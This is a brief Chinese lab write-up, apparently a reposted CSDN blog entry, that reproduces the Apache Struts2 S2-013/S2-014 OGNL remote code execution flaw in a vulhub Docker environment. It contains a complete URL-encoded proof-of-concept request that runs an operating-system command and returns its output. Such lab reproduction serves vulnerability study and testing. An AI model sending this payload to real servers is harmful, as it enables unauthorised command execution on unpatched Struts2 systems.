S2-013/S2-014 远程代码执行漏洞

前言

S2-014 是对 S2-013 修复的加强,在 S2-013 修复的代码中忽略了 ${ognl_exp} OGNL 表达式执行的方式,因此 S2-014 是对其的补丁加强。

影响版本

2.0.0 - 2.3.14.1

环境搭建

cd vulhub/struts2/s2-013

docker-compose build && docker-compose up -d

漏洞复现

测试是否存在漏洞

http://yourIP:8080/link.action?a=%24{1%2b1}

已经解析成2了

任意命令执行POC:

http://yourIP:8080/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27id%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/106997050
今日推荐